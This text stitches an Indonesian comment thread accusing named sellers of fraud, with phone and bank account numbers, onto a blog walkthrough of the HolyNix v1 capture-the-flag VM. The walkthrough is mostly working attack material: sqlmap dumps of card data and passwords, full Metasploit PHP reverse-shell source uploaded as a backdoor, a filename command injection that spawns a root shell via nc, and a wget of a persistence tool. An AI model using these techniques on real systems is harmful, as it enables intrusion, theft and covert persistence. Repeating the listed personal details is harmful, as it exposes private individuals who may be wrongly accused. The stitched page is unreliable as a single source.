    Bintang Rezki Elektronik adalah PENIPU Silahkan Search di google untuk penelusuran dan pembuktian Jawaban Kami ini
  28. mario says:
    ratuplazabhineka.com tu gmn ???
  29. mario says:
    ratuplazabhineka.com itu gimana???
  30. bm70com says:
    @ mario :
    ratuplazabhineka.com adalah PENIPU BESAR !!!
    Alamat yang dipakai yakni Jl. YOS SUDARSO KAV2 no 66
    mencatut Alamat Kantor sebuah Expedisi Cargo yakni RPX
    klik DISINI dan DISINI untuk bukti,
    dan harga yang ditampilkan ngak masuk akal !!!
    ratuplazabhineka.com adalah PENIPU
    dan punya banyak KLONINGAN lengkap KLIK DISINI
    BERHATI-HATILAH, SEBARKAN INFORMASI INI
  31. adjie says:
    Mnta tlg almt lengkap pemilik no rek BNI 132586481 a.n rio rendika sukoco ngakunya mahasiswa undip semarang di fb namanya abel putrajasmine tmnq trtipu 3,2.trmksh atas bantuannya
    BM70COM: Link FB sepertinya sudah dihapus ? Tolong Info lainnya .. Telpon dll
  32. acik says:
    Jadi sejahtera shop itu penipu kagak sih?bingung nih..aq pingin beli, tapi gak tau dia penipu ato kagak?
    BM70COM says : Memang PENIPU !!! ada postingan Kami tentang Sejahtera Shop
  33. Dina says:
    Lah.. Trus penjual yg jujur mana? Kasi tau donk
    BM70COM says : banyak juga lho sis, silahkan pelajari saja dulu atau tanya pada Kami biar ditelusuri ok :-)
  34. Michellin says:
    hy sis/bro.. saya pgn beli DSLR yg bm dr www.DSLR.shop.tc tu penipu ato bukan ya????? tlong brikan jwbn yang secepat’nya ya… makasi :)
    BM70COM :
    Kami telah pelajari Web GRATIS-nya isinya banyak yang Hoax alias sambar sana-sini yakni ngak benar/palsu,
    juga Kami telah browsing Kami dapat bukti ini adalah PENIPUAN
    Contoh postingan yang Kami dapat =
    www.dslr.shop.tc — PENIPU dari Pekanbaru, RIAU — Nama : Tomy Hp. 081533333344
    Hati-hati web http://www.dslr.shop.tc dengan menyebut namanya Tomy dengan no. HP 081533333344, yang menjual kamera DSLR murah ini Penipu… Jangan percaya iklan2nya yang dipasang di seluruh iklan di internet yang bertujuan menjaring korban untuk mendulang keuntungan pribadi, teman saya sudah mengalaminya dan telah ditipu olehnya sebesar 3,3juta rupiah untuk pembelian camera DSLR Canon EOS 550D, uang sudah di transfer via Bank Mandiri ke rekening teman tomy ini dengan nama Dini Aulia no. rek. mandiri 106.000.991.5136.. tapi kamera yang diinginkan tidak dikirim sampe sekarang…. HATI HATI http://www.dslr.shop.tc/ Nama TOMY No. HP 081533333344 PENIPU……..
    Mohon bantuan kawan2 kaskus bantu kami melacak keberadaan Tomy dengan no. Hp. 081533333344 yang mengaku di Pekanbaru, Riau dan menyebarkan informasi berita PENIPUAN ini ke rekan2 yang lain.
  35. ogel says:
    saya mau tanya kalo wab ini http://www.berryindo.net penipu gak ya broo??
    BM70COMsays : http://berryindo.net adalah PENIPU
    sudah ada ulasan Kami tentang ini,
    yang asli dan benaran adalah http://berryindo.com
  36. dian says:
    Tambah satu lagi daftar Penipu berkedok penjual HP BM, saya da ketipu 2jt buat BB onyx 2.
    SUMBER CELLULAR
    NAMA: AMRIN MULIA
    ALAMAT: Jl. Raden Patah Block III No. 1-2 batam city
    NO HP: 085763033331. Saya bener2 kesal knp bs ketipu padahal nama n nama d no.rek beda.
    Bank Bri
    a/n reza derisman
    no rekening:
    063301007603503. Tp gmn lg duit da lenyap. Apa harus d kata lg. Tp buat yg blom kena tipu harap waspada dengan website d atas. Buat POLRI semoga dapat menindak lanjuti kejahatan d dunia maya (internet) dan dapat segera d tangkap pelakunya.
    Smoga ALLAH membalas smua perbuatan si penipu dengan setimpal.
    BM70COM says :
    masa iya a/n reza derisman gan ?
    karena jika yang namanya reza derisman
    adalah juga warga duri riau sini,
    punya warnet di jalan sudirman 500meter
    sebelum Ramayana.. yang difitnah
    dibanyak blog yakni photo dan id ktpnya
    kalau ngak percaya,
    datang saja ke ke tkp sini gan,
    tolong kirim via email kami,
    scan bukti transfer dan laporan kepolisian gan,

    sumber: http://bm70.com/?p=1084

Ngabuburit With HolyNix V.1

OK, today I’m trying to playin’ around with HolyNix V.1 while waiting for fasting break time. You may refer to my previous post, on where to get the HolyNix. You may also find a bunch of walk-through / help / cheat or whatever you name it, on how to solve the challenge on Google. But I prefer to solve it by myself. It’s hell a lot of more phun to solve it by yourself then reading another person walk-through. So what do we need in here? 1. Vmware-player 2. Backtrack 5 3. Brain and a strong desire to finish the challenge.

First thing to do, run the extracted vmware image wth vmware player. Next I check my vmware network address to determine the HolyNix network address. With using ifconfig command, I had this result.

lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:194059 errors:0 dropped:0 overruns:0 frame:0
          TX packets:194059 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:137227867 (137.2 MB)  TX bytes:137227867 (137.2 MB)

vmnet1    Link encap:Ethernet  HWaddr 00:50:56:c0:00:01 
          inet addr:192.168.53.1  Bcast:192.168.53.255
          inet6 addr: fe80::250:56ff:fec0:1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:93028 errors:0 dropped:0 overruns:0 frame:0
          TX packets:96619 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

vmnet8    Link encap:Ethernet  HWaddr 00:50:56:c0:00:08 
          inet addr:172.16.4.1  Bcast:172.16.4.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fec0:8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1 errors:0 dropped:0 overruns:0 frame:0
          TX packets:515 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Ok, now I fire up my nmap , and try to scan the network, since the system runs two virtual network for vmware, I start to scan from the vmnet1. Using nmap I just simply run

root@bt:/# nmap 192.168.53.1/24

Starting Nmap 5.51 ( http://nmap.org ) at 2011-08-22 15:46 WIT
Nmap scan report for 192.168.53.1
Host is up (0.000023s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
8080/tcp open  http-proxy

Nmap scan report for 192.168.53.129
Host is up (0.0016s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:BC:05:DE (VMware)

Nmap scan report for 192.168.53.254
Host is up (0.00011s latency).
All 1000 scanned ports on 192.168.53.254 are filtered
MAC Address: 00:50:56:E4:DA:28 (VMware)

Nmap done: 256 IP addresses (3 hosts up) scanned in 14.29 seconds

Nice, now I know that HolyNix runs on 192.168.53.129. And obviously it runs a web server. I need more information about this server, so I run nmap once again with some prefix on it
nmap -T4 -A -v 192.168.53.129

Starting Nmap 5.51 ( http://nmap.org ) at 2011-08-22 15:52 WIT
NSE: Loaded 57 scripts for scanning.
Initiating ARP Ping Scan at 15:52
Scanning 192.168.53.129 [1 port]
Completed ARP Ping Scan at 15:52, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:52
Completed Parallel DNS resolution of 1 host. at 15:52, 0.02s elapsed
Initiating SYN Stealth Scan at 15:52
Scanning 192.168.53.129 [1000 ports]
Discovered open port 80/tcp on 192.168.53.129
Completed SYN Stealth Scan at 15:52, 0.10s elapsed (1000 total ports)
Initiating Service scan at 15:52
Scanning 1 service on 192.168.53.129
Completed Service scan at 15:52, 6.02s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.53.129
NSE: Script scanning 192.168.53.129.
Initiating NSE at 15:52
Completed NSE at 15:52, 0.03s elapsed
Nmap scan report for 192.168.53.129
Host is up (0.00060s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
|_http-title: Site doesn’t have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
MAC Address: 00:0C:29:BC:05:DE (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.24 – 2.6.25
Uptime guess: 0.181 days (since Mon Aug 22 11:31:40 2011)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=206 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.60 ms 192.168.53.129

Read data files from: /usr/local/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
           Raw packets sent: 1023 (46.424KB) | Rcvd: 1023 (42.564KB)

Well, from the information we know that it runs Apache server with PHP+Suhosin Patch on it. Nice! Lets open the server with browser, and see what information we could get from it.
Well, what we found here, a log in system with two inputs on it. Basically, a normal pen-tester will try to SQLi the input, so let’s have a try. I start it by put in ‘ char into both input box, and here what I got.
SQL Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ””’ at line 1

SQL Statement:SELECT * FROM accounts WHERE username=’\” AND password=”’

Great, now lets fire up sqlmap and see what we’ll get.

./sqlmap.py -u “http://192.168.53.129/index.php?page=login.php” –data “user_name=a&password=z&Submit_button=Submit” –dbs –risk=3 –level=5

[09:37:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[09:37:49] [INFO] fetching database names
[09:37:49] [INFO] read from file ‘/pentest/web/scanners/sqlmap/output/192.168.53.129/session’: 4
[09:37:49] [INFO] the SQL query used returns 4 entries
[09:37:49] [INFO] read from file ‘/pentest/web/scanners/sqlmap/output/192.168.53.129/session’: information_schema
[09:37:49] [INFO] read from file ‘/pentest/web/scanners/sqlmap/output/192.168.53.129/session’: clients
[09:37:49] [INFO] read from file ‘/pentest/web/scanners/sqlmap/output/192.168.53.129/session’: creds
[09:37:49] [INFO] read from file ‘/pentest/web/scanners/sqlmap/output/192.168.53.129/session’: mysql
available databases [4]:
[*] clients
[*] creds
[*] information_schema
[*] mysql

HollyNix! It’s vulner against SQLi. OK let see what we could get from clients table.

/sqlmap.py -u “http://192.168.53.129/index.php?page=login.php” –data “user_name=a&password=z&Submit_button=Submit” -p password -D clients -T accounts  –dump –risk=3 –level=5

Database: clients
Table: accounts
[29 entries]
+——————————————–+———————+—–+——————————–+–
| address                                    | CCN                 | cid | email                          | exp     | name     | phone        | surname    | type       |
+——————————————–+———————+—–+——————————–+–
| 4562 Boundary St:Jacksonville, FL 32216    | 5392 7367 3484 0469 | 1   | BenjaminNLynch@example.org     | 8/2013  | Benjamin | 904-683-8817 | Lynch      | MasterCard |
| 147 Woodland Dr:Schaumburg, IL 60173       | 5453 6102 5739 0358 | 2   | MinervaJBerry@example.org      | 9/2015  | Minerva  | 708-977-4242 | Berry      | MasterCard |
| 2493 Khale St:Myrtle Beach, SC 29577       | 6011 4994 1010 5322 | 3   | LindseyLBowman@example.org     | 12/2011 | Lindsey  | 843-626-8781 | Bowman     | Discover   |
| 3991 Elliott St:Manchester, NH 03101       | 5416 8729 8148 9486 | 4   | JohnPHamblin@example.org       | 3/2013  | John     | 603-627-9587 | Hamblin    | MasterCard |
| 3920 Cherry Camp Rd:Chicago, IL 60620      | 4916 9278 0028 9828 | 5   | OdellJWalters@example.org      | 10/2014 | Odell    | 773-487-5353 | Walters    | Visa       |
| 1378 McDowell St:Columbia, TN 38401        | 4716 4682 6173 7726 | 6   | GaryMMichels@example.org       | 9/2012  | Gary     | 931-381-8814 | Michels    | Visa       |
| 3095 Fort St:Rocky Mount, NC 27801         | 4916 3448 1227 3800 | 7   | RichardMFowler@example.org     | 3/2012  | Richard  | 252-904-5011 | Fowler     | Visa       |
| 3599 Marigold Ln:Fort Lauderdale, FL 33311 | 5104 3306 6868 0320 | 8   | HarrySPineda@example.org       | 11/2012 | Harry    | 305-401-7394 | Pineda     | MasterCard |
| 2665 Timber Oak Dr:Lubbock, TX 79401       | 6011 6457 4242 8259 | 9   | RosemaryLCutshall@example.org  | 1/2012  | Rosemary | 806-200-5571 | Cutshall   | Discover   |
| 4305 Hickory St:Ogden, UT 84401            | 5537 6754 6591 0362 | 10  | MaryECox@example.org           | 5/2013  | Mary     | 801-710-0941 | Cox        | MasterCard |
| 3965 Willis Ave:Daytona Beach, FL 32114    | 4485 6129 3846 3674 | 11  | WinnieMFischer@example.org     | 12/2011 | Winnie   | 386-323-1724 | Fischer    | Visa       |
| 1707 Holden St:San Diego, CA 92103         | 5317 6906 5346 3401 | 12  | FelixDChagnon@example.org      | 1/2013  | Felix    | 619-214-0886 | Chagnon    | MasterCard |
| 1974 Kildeer Dr:Sunrise, FL 33323          | 5191 4153 2070 6524 | 13  | MariaFJones@example.org        | 2/2012  | Maria    | 754-244-8539 | Jones      | MasterCard |
| 1353 Red Bud Ln:Jersey City, NJ 07305      | 6011 3022 5072 3784 | 14  | WilliamGRichardson@example.org | 5/2012  | William  | 862-244-2784 | Richardson | Discover   |
| 4447 Poplar Ln:Hialeah, FL 33012           | 5542 3658 2948 1283 | 15  | RosellaJKendall@example.org    | 3/2013  | Rosella  | 305-504-4951 | Kendall    | MasterCard |
| 4250 Green Acres Rd:Norlina, NC 27563      | 5265 6251 8967 4594 | 16  | CarolannJThompson@example.org  | 11/2012 | Carolann | 252-456-9843 | Thompson   | MasterCard |
| 4011 Randall Dr:Kawaihae, HI 96743         | 4539 1845 7920 4698 | 17  | MarthaCFrost@example.org       | 5/2015  | Martha   | 808-880-6054 | Frost      | Visa       |
| 4253 Hummingbird Way:Cambridge, MA 02141   | 4539 1640 5255 9206 | 18  | ArthurRBailey@example.org      | 3/2012  | Arthur   | 781-994-7119 | Bailey     | Visa       |
| 2759 Hillview St:Cayce, SC 29033           | 5288 7897 3058 6856 | 19  | RhondaRBrown@example.org       | 10/2012 | Rhonda   | 803-794-7513 | Brown      | MasterCard |
| 967 Flinderation Rd:Burr Ridge, IL 61257   | 5576 0624 1325 2886 | 20  | MelvinRWhite@example.org       | 3/2014  | Melvin   | 708-399-3626 | White      | MasterCard |
| 2046 Masonic Dr:Billings, MT 59102         | 5436 9085 7922 0747 | 21  | SaraRPatton@example.org        | 11/2011 | Sara     | 406-630-4475 | Patton     | MasterCard |
| 3203 Quilly Ln:Columbus, OH 43215          | 4716 9173 5435 8725 | 22  | CarlaKWebb@example.org         | 12/2012 | Carla    | 614-499-2955 | Webb       | Visa       |
| 2121 Oakmound Rd:Chicago, IL 60603         | 4916 1431 9917 0062 | 23  | HaroldBWest@example.org        | 2/2014  | Harold   | 773-214-6846 | West       | Visa       |
| 4822 Veltri Dr:Tuntutuliak, AK 99680       | 4916 9129 4596 5953 | 24  | GeorginaEReeves@example.org    | 7/2015  | Georgina | 907-256-5473 | Reeves     | Visa       |
| 4104 Catherine Dr:Fargo, ND 58103          | 6011 6041 8232 5764 | 25  | SteveLStokes@example.org       | 11/2011 | Steve    | 701-238-6553 | Stokes     | Discover   |
| 2536 Public Works Dr:Chattanooga, TN 37408 | 4929 5329 4895 9608 | 26  | LenaKlein@example.org          | 9/2013  | Lena     | 423-313-8160 | Klein      | Visa       |
| 4970 Haven Ln:Lansing, MI 48933            | 4485 9777 7807 3283 | 27  | MichaelMahler@example.org      | 10/2014 | Michael  | 517-652-8204 | Mahler     | Visa       |
| 3160 Carolyns Circle:Dallas, TX 75212      | 5333 8067 9908 8205 | 28  | SandraNussbaum@example.org     | 4/2015  | Sandra   | 214-794-5803 | Nussbaum   | MasterCard |
| 4834 Freed Dr:Stockton, CA 95202           | 4716 1304 2847 6396 | 29  | JessicaDuerr@example.org       | 10/2012 | Jessica  | 209-679-1447 | Duerr      | Visa       |
+——————————————–+———————+—–+——————————–+
WOW! it contains a tons of client’s cc number. Nice! Lets move forward to creds table, and see what we’ll get.

./sqlmap.py -u “http://192.168.53.129/index.php?page=login.php” –data “user_name=a&password=z&Submit_button=Submit” -p password -D creds -T accounts  –dump –risk=3 –level=5

Database: creds
Table: accounts
[11 entries]
+—–+——————–+——–+————+
| cid | password           | upload | username   |
+—–+——————–+——–+————+
| 1   | Ih@cK3dM1cR05oF7   | 0      | alamo      |
| 2   | P3n7@g0n0wN3d      | 1      | etenenbaum |
| 3   | d15cL0suR3Pr0J3c7  | 1      | gmckinnon  |
| 4   | Ik1Ll3dNiN@r315er  | 1      | hreiser    |
| 5   | p1@yIngW17hPh0n35  | 1      | jdraper    |
| 6   | @rR35t3D@716       | 1      | jjames     |
| 7   | m@k1nGb0o7L3g5     | 1      | jljohansen |
| 8   | wH@7ar37H3Fed5D01n | 1      | kpoulsen   |
| 9   | f@7H3r0FL1nUX      | 0      | ltorvalds  |
| 10  | n@5aHaSw0rM5       | 1      | mrbutler   |
| 11  | Myd@d51N7h3NSA     | 1      | rtmorris   |
+—–+——————–+——–+————+

Oh yeah! now, we have all the user login information, complete with their unencrypted password. Now lets try to test the user name and password on the login page. I choose alamo and etenenbaum, since they have different value on the upload field.
With username alamo
Ok, lets have some walk for while, check all the menu on the left side. Looks like this user doesn’t have the upload feature on it. So, from here we could know that the upload field on the db told us that whether the user has the ability of upload or not. Lets give a try on atenenbaum username
Great! now lets take a look at the uploaded file.

Forbidden

You don’t have permission to access /~etenenbaum/holynix.png on this server.

Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch Server at 192.168.53.129 Port 80
Ops! looks like we don’t have access to read the file, seems that the file not chmod correctly. Let’s try another file, this time I will upload a gzip file, since there is a feature on the upload menu that will extract a gzip file automatically. Logically, the gzip will run by web server system, which the extracted file should be owned by web server and will be accessible trough the browser, since it was belong to the web server system.
As we thought, the system change the ownership of the file , rite’ after it extract the compressed file. Lets have a check, lets open

http://192.168.53.129/~etenenbaum/holynix2.png

And there you go the image file successfully accessed through the browser. It’s a good sign, now we could upload our PHP backdoor into the server. I will using Metasploit to generate the backdoor. Metasploit provide some php backdoor, from bind type to connect back type. (reverse TCP) I will choose meterpreter type, although it was build for Windows based system but Hey!, this is my hacking path, and I want to try it, so, get back! choose your own backdoor by yourself.
Lets fire up the msfconsole and generate a PHP backdoor from it.
                                                                                                                                                                                                                                                                                                                               

       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ — –=[ 684 exploits – 355 auxiliary
+ — –=[ 217 payloads – 27 encoders – 8 nops

msf >

and here we go!
msf > use payload/php/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options

Module options (payload/php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   —-   —————  ——–  ———–
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

msf payload(reverse_tcp) > set LHOST 192.168.53.1
LHOST => 192.168.53.1
msf payload(reverse_tcp) > set LPORT 5050
LPORT => 5050
msf payload(reverse_tcp) > generate -t raw
#

error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = ‘192.168.53.1’;
$port = 5050;
if (FALSE !== strpos($ip, “:”)) {
        # ipv6 requires brackets around the address
        $ip = “[“. $ip .”]”;
}

if (($f = ‘stream_socket_client’) && is_callable($f)) {
        $s = $f(“tcp://{$ip}:{$port}”);
        $s_type = ‘stream’;
} elseif (($f = ‘fsockopen’) && is_callable($f)) {
        $s = $f($ip, $port);
        $s_type = ‘stream’;
} elseif (($f = ‘socket_create’) && is_callable($f)) {
        $s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
        $res = @socket_connect($s, $ip, $port);
        if (!$res) { die(); }
        $s_type = ‘socket’;
} else {
        die(‘no socket funcs’);
}
if (!$s) { die(‘no socket’); }

switch ($s_type) {
case ‘stream’: $len = fread($s, 4); break;
case ‘socket’: $len = socket_read($s, 4); break;
}
if (!$len) {
        # We failed on the main socket.  There’s no way to continue, so
        # bail
        die();
}
$a = unpack(“Nlen”, $len);
$len = $a[‘len’];

$b = ”;
while (strlen($b) < $len) {
        switch ($s_type) {
        case ‘stream’: $b .= fread($s, $len-strlen($b)); break;
        case ‘socket’: $b .= socket_read($s, $len-strlen($b)); break;
        }
}

# Set up the socket for the main stage to use.
$GLOBALS[‘msgsock’] = $s;
$GLOBALS[‘msgsock_type’] = $s_type;
eval($b);
die();
msf payload(reverse_tcp) >

Just copy the PHP code into a file and save it into whatever name you want, in my case it would be temp.php and don’t forget to give ?> at the end of the code. So we already have a meterpreter backdoor which will connect into our IP address on port 5050. Next, lets gzip the file and upload into the server through the upload menu. On our side, run a listener from Metasploit.

msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.53.1
LHOST => 192.168.53.1
msf exploit(handler) > set LPORT 5050
LPORT => 5050
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.53.1:5050
[*] Starting the payload handler…

Now open the temp.php on the server through browser at http://192.168.53.129/~etenenbaum/temp.php
lets have a check on our msfconsole and see what happen

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.53.1:5050
[*] Starting the payload handler…
[*] Sending stage (31612 bytes) to 192.168.53.129
[*] Meterpreter session 1 opened (192.168.53.1:5050 -> 192.168.53.129:47191) at 2011-08-23 10:48:24 +0700

meterpreter >

Nice! the meterpreter backdoor has already runs smoothly :), try to playin’ around fro while, type help for any command it has. So what next? I already tried to run many kernel exploit on it, from a to z, you name it, but all come with fail. So I once again re-check the system whether I could find any clue on it. OK, after searching for a while I got two possibly ways to get into the system, 1. Changetrack which has a bug on it  and second one is Knockknock which usually used to connect into a system through port knocking. I tried  to download the knockknock application from the link provide on the message board and install it on my system. Next thing, is read the manual file which provide on the installer folder.
Using the meterpreter backdor, I tried to download the knockknock config from the server into my system, based on the documentation , the knockknock config filee saved on the /etc/knockknock.d/profiles/

meterpreter > cd /etc/knockknock.d/profiles/
meterpreter > pwd
/etc/knockknock.d/profiles
meterpreter > ls

Listing: /etc/knockknock.d/profiles
===================================

Mode             Size  Type  Last modified              Name
—-             —-  —-  ————-              —-
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  alamo
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  etenenbaum
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  gmckinnon
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  hreiser
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  jdraper
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  jjames
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  jljohansen
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  kpoulsen
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  ltorvalds
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  mrbutler
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  rtmorris

meterpreter > ls alamo

Listing: alamo
==============

Mode              Size  Type  Last modified              Name
—-              —-  —-  ————-              —-
100644/rw-r–r–  25    fil   2010-11-09 09:55:45 +0700  cipher.key
100644/rw-r–r–  27    fil   2010-11-09 09:55:45 +0700  config
100644/rw-r–r–  2     fil   2010-11-09 11:12:55 +0700  counter
100644/rw-r–r–  25    fil   2010-11-09 09:55:45 +0700  mac.key

meterpreter > download alamo/cipher.key > /tmp
[*] downloading: alamo/cipher.key -> /tmp
[*] downloaded : alamo/cipher.key -> /tmp/alamo/cipher.key
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > download alamo/config > /tmp
[*] downloading: alamo/config -> /tmp
[*] downloaded : alamo/config -> /tmp/alamo/config
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > download alamo/counter > /tmp
[*] downloading: alamo/counter -> /tmp
[*] downloaded : alamo/counter -> /tmp/alamo/counter
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > download alamo/mac.key > /tmp
[*] downloading: alamo/mac.key -> /tmp
[*] downloaded : alamo/mac.key -> /tmp/alamo/mac.key
[-] stdapi_fs_stat: Operation failed: 1
meterpreter >

Lets have a check on the /temp folder, and see whether we had successfully download the file. And yes, we already download the file into our system. Next put the file on the root folder and create a new knockknock client profile, just follow the instruction on the INSTALL file, I will not explain it on here. After settings the application, I try to run knockknock to have some access into the server through ssh port, start from alamo user. Using the password from our previous dump db.

root@bt:~/.knockknock# knockknock -p 22 192.168.53.129
*** Success: knock sent.
root@bt:~/.knockknock# ssh -l alamo 192.168.53.129
alamo@192.168.53.129’s password:
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
alamo@holynix:~$

Nice! we successfully get into the server through ssh connection. Lets have some information

alamo@holynix:~$ id
uid=1000(alamo) gid=115(developers) groups=115(developers)
alamo@holynix:~$ ls -al /home/
total 56
drwxr-xr-x 14 root       root       4096 2010-11-08 21:53 .
drwxr-xr-x 21 root       root       4096 2010-11-08 21:09 ..
drwxr-xr-x  2 alamo      developers 4096 2010-11-08 21:47 alamo
drwxrwxr-x 20 nobody     developers 4096 2010-11-08 21:54 development
drwxr-xr-x  2 etenenbaum users      4096 2011-11-19 09:11 etenenbaum
drwxr-xr-x  2 gmckinnon  users      4096 2010-11-08 21:47 gmckinnon
drwxr-xr-x  2 hreiser    staff      4096 2010-11-08 21:47 hreiser
drwxr-xr-x  2 jdraper    users      4096 2010-11-08 21:47 jdraper
drwxr-xr-x  2 jjames     staff      4096 2010-11-08 21:47 jjames
drwxr-xr-x  2 jljohansen developers 4096 2010-11-08 21:47 jljohansen
drwxr-xr-x  2 kpoulsen   users      4096 2010-11-08 21:47 kpoulsen
drwxr-xr-x  3 ltorvalds  admin      4096 2011-11-18 13:25 ltorvalds
drwxr-xr-x  2 mrbutler   staff      4096 2010-11-08 21:47 mrbutler
drwxr-xr-x  2 rtmorris   users      4096 2010-11-08 21:47 rtmorris
alamo@holynix:~$

Ok, we got ace in here, lets wrap up everything, we already knew that Changetrack has a bug on it which will lead into privilege escalation, luckily user alamo has the same group with Changetrack, which access into the changetrack developer folder on /home/developer. Based on the report to, exploit Changetrack bug, we just need to create a file with a command
touch "<\`nc -l -p 5001 -e \$SHELL\`"
and then run ls command on the folder. If the plan runs as expected, the command line will be executed and it will open a root shell prompt (hopefully). And next just connect to the system on that port. Don’t forget to do port knocking before connect trough nc.

root@bt:~# knockknock -p 5001 192.168.53.129
*** Success: knock sent.
root@bt:~# nc 192.168.53.129 5001
(UNKNOWN) [192.168.53.129] 5001 (?) : Connection refused
root@bt:~# knockknock -p 5001 192.168.53.129
*** Success: knock sent.
root@bt:~# nc 192.168.53.129 5001
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/root
uname -a
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux

0wn3d! Time to break the fasting… Oh wait, for more fun and real case scenario, I try to put some backdoor into the system, in case the admin knows that his system already compromise trough the Changetrack bug. I’m using cymothoa, you might find in on your BT 5, I just simplify copy the compiled (binary) file of cymothoa into /var/www folder, the I download it from the holynix

wget http://192.168.53.1/cymothoa
ls
cymothoa
holynix.sql
holynix.sql.1
ps ax
  PID TTY      STAT   TIME COMMAND
    1 ?        Ss     0:04 /sbin/init
    2 ?        S<     0:00 [kthreadd]
    3 ?        S<     0:00 [migration/0]
    4 ?        S<     0:00 [ksoftirqd/0]
    5 ?        S<     0:00 [watchdog/0]
    6 ?        S<     0:01 [events/0]
    7 ?        S<     0:00 [khelper]
   41 ?        S<     0:00 [kblockd/0]
   44 ?        S<     0:00 [kacpid]
   45 ?        S<     0:00 [kacpi_notify]
  176 ?        S<     0:00 [kseriod]
  214 ?        S      0:00 [pdflush]
  215 ?        S      0:00 [pdflush]
  216 ?        S<     0:00 [kswapd0]
  258 ?        S<     0:00 [aio/0]
 1517 ?        S<     0:00 [ksuspend_usbd]
 1522 ?        S<     0:00 [khubd]
 1526 ?        S<     0:00 [ata/0]
 1531 ?        S<     0:00 [ata_aux]
 1626 ?        S<     0:00 [scsi_eh_0]
 1869 ?        S<     0:00 [scsi_eh_1]
 1871 ?        S<     0:00 [scsi_eh_2]
 2636 ?        S<     0:04 [kjournald]
 2796 ?        S
 3081 ?        S<     0:00 [kgameportd]
 3252 ?        S<     0:00 [kpsmoused]
 4208 ?        S

 4610 tty4     Ss+    0:00 /sbin/getty 38400 tty4
 4613 tty5     Ss+    0:00 /sbin/getty 38400 tty5
 4619 tty2     Ss+    0:00 /sbin/getty 38400 tty2
 4622 tty3     Ss+    0:00 /sbin/getty 38400 tty3
 4625 tty6     Ss+    0:00 /sbin/getty 38400 tty6
 4659 ?        Ss     0:00 /sbin/syslogd -u syslog
 4678 ?        S      0:01 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
 4680 ?        Ss     0:00 /sbin/klogd -P /var/run/klogd/kmsg
 4699 ?        Ss     0:00 /usr/sbin/sshd
 4755 ?        S      0:00 /bin/sh /usr/bin/mysqld_safe
